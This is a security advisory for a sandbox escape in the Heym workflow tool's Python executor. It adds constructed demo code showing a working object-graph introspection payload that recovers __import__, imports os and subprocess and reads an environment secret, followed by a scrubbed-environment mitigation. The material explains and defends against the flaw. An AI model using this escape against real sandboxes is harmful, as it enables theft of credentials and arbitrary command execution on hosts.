PT-2026-40452 · Heym · Heym

Published: 2026-05-12 · Updated: 2026-05-14 · CVE-2026-45227
CVSS v3.1: 8.8 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: Heym versions prior to 0.0.21
Description: A sandbox escape exists in the custom Python tool executor. An authenticated workflow author can bypass the sandbox restrictions using object-graph introspection primitives: from any ordinary object, Python introspection reaches other loaded classes and their module globals, from which the unrestricted import function can be recovered and used to import blocked modules such as os and subprocess. Because the executor inherits the backend's environment variables, the escaped code can read the database credentials and encryption keys stored in them and execute arbitrary host commands as the backend service user.
Recommendations: Update to version 0.0.21 or later. Since the executor exposed inherited environment variables to workflow authors, treat database credentials and encryption keys that were present in the backend environment as potentially compromised and rotate them after updating.
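The introspection escape and the environment-inheritance impact described above, as an added worked example (constructed here; it is not Heym's code and not the advisory's exploit): a toy executor that strips `__import__` from the builtins handed to `exec()`, the generic object-graph walk that recovers the real `__import__` from the module globals of any Python-defined class, and a scrubbed-environment subprocess runner showing why backend secrets should not be inherited by an executor at all. The denylist, the `DEMO_DB_PASSWORD` variable and every function name are assumptions of this example.

```python
import os
import subprocess
import sys
import textwrap

# Builtins the toy sandbox strips from the namespace handed to exec().
# Constructed denylist; the advisory does not document Heym's actual list.
BLOCKED_BUILTINS = {"__import__", "open", "eval", "exec", "compile"}


def run_in_toy_sandbox(code: str) -> dict:
    """Execute workflow-author code with a restricted builtins dict.
    This is the denylist pattern the advisory describes as bypassable."""
    import builtins
    safe = {k: v for k, v in vars(builtins).items() if k not in BLOCKED_BUILTINS}
    ns = {"__builtins__": safe}
    exec(code, ns)
    return ns


def direct_import_is_blocked() -> bool:
    """A plain `import os` fails: exec() resolves __import__ via the sandbox builtins."""
    try:
        run_in_toy_sandbox("import os")
    except ImportError:
        return True
    return False


# The escape: walk the object graph from an innocuous literal to every loaded
# class, pick one implemented in Python (its __init__ carries __globals__), and
# take the real __import__ from that module's __builtins__, which the sandbox
# never touched.
ESCAPE_PAYLOAD = textwrap.dedent("""
    imp = None
    for cls in ().__class__.__base__.__subclasses__():
        try:
            g = getattr(cls.__init__, "__globals__", None)
        except Exception:
            continue
        if not isinstance(g, dict) or "__builtins__" not in g:
            continue
        b = g["__builtins__"]
        imp = b.get("__import__") if isinstance(b, dict) else getattr(b, "__import__", None)
        if imp is not None:
            break
    os_mod = imp("os")
    subprocess_mod = imp("subprocess")
    leaked_secret = os_mod.environ.get("DEMO_DB_PASSWORD")
    can_run_commands = callable(subprocess_mod.run)
""")


def escape_and_read_env() -> dict:
    """Plant a constructed secret in the host environment (standing in for the
    inherited backend credentials) and let the sandboxed payload recover it."""
    os.environ["DEMO_DB_PASSWORD"] = "constructed-secret"
    ns = run_in_toy_sandbox(ESCAPE_PAYLOAD)
    return {"leaked_secret": ns["leaked_secret"],
            "can_run_commands": ns["can_run_commands"]}


def run_with_scrubbed_env(code: str) -> str:
    """The part of the fix that does not depend on a denylist: run author code
    in a separate interpreter with an allow-listed environment, so inherited
    secrets are simply absent. A separate process alone does not stop command
    execution as the service user; that still needs OS-level confinement."""
    os.environ["DEMO_DB_PASSWORD"] = "constructed-secret"
    proc = subprocess.run(
        [sys.executable, "-I", "-c", code],
        env={"PATH": os.environ.get("PATH", "")},  # nothing else is inherited
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.strip()
```

The payload uses no blocked name: attribute access, `getattr`, `isinstance` and `callable` are enough to reach a module whose `__builtins__` still holds the real `__import__`, which is why removing names from the builtins dict is not a security boundary for CPython.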

Weakness Enumeration: Protection Mechanism Failure
Related Identifiers: CVE-2026-45227
Affected Products: Heym